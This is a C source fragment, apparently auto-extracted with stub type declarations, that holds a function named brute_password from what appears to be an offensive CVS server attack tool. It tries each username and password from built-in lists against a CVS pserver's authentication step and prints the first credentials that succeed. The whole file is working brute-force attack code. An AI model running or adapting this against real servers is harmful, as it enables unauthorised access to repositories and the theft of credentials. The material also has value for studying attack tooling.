
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


struct TYPE_6__ {scalar_t__ name; } ;
struct TYPE_5__ {scalar_t__ name; } ;
struct TYPE_4__ {int id; scalar_t__ name; } ;


 char* BAD_TRIP ;
 TYPE_3__* CVSROOTS ;
 int CVS_AUTH_FAILED ;
 int CVS_AUTH_SUCCESS ;
 int CVS_VERIF ;
 char* GOOD_TRIP ;
 TYPE_2__* PASSWORDS ;
 char* SUCCESS_LOGON ;
 TYPE_1__* USERNAMES ;
 char* flush_sock () ;
 int free (char*) ;
 int host ;
 int info (char*,...) ;
 int nclose () ;
 int nopen (int ,int ) ;
 int nprintf (int ,scalar_t__,scalar_t__,int ) ;
 scalar_t__ pass ;
 int port ;
 int printf (char*,scalar_t__,scalar_t__,scalar_t__) ;
 scalar_t__ root ;
 int scramble (scalar_t__) ;
 scalar_t__ strstr (char*,int ) ;
 scalar_t__ user ;

int brute_password(void)
{
    int i, c, ret=0;
    char * rbuf;

    info("Bruteforcing cvs password...\n");
    for (c = 0; USERNAMES[c].name; c++)
        {
            if (!user && USERNAMES[c].id == -1) continue;
            for (i = 0; PASSWORDS[i].name; i++)
                {
                    info("Trying login = %s, pass = %s\t", user?user:USERNAMES[c].name,
                         PASSWORDS[i].name);
                    nopen(host, port);
                    nprintf(CVS_VERIF,root?root:CVSROOTS[USERNAMES[c].id].name,
                            user?user:USERNAMES[c].name, scramble(PASSWORDS[i].name) );
                    rbuf = flush_sock();
                    nclose();
                    if (strstr(rbuf, CVS_AUTH_FAILED))
                        info(BAD_TRIP, rbuf);
                    else if (strstr(rbuf, CVS_AUTH_SUCCESS))
                        {
                            info(GOOD_TRIP);
                            if (!root)
                                root = CVSROOTS[ USERNAMES[c].id ].name;
                            if (!user)
                                user = USERNAMES[c].name;
                            pass = PASSWORDS[i].name;
                            free(rbuf);
                            printf(SUCCESS_LOGON, user, pass, root);
                            return (1);
                        }
                    else
                        info(BAD_TRIP);
                    free(rbuf);
                }
            if (user)
                return (0);
        }
    return (0);
}
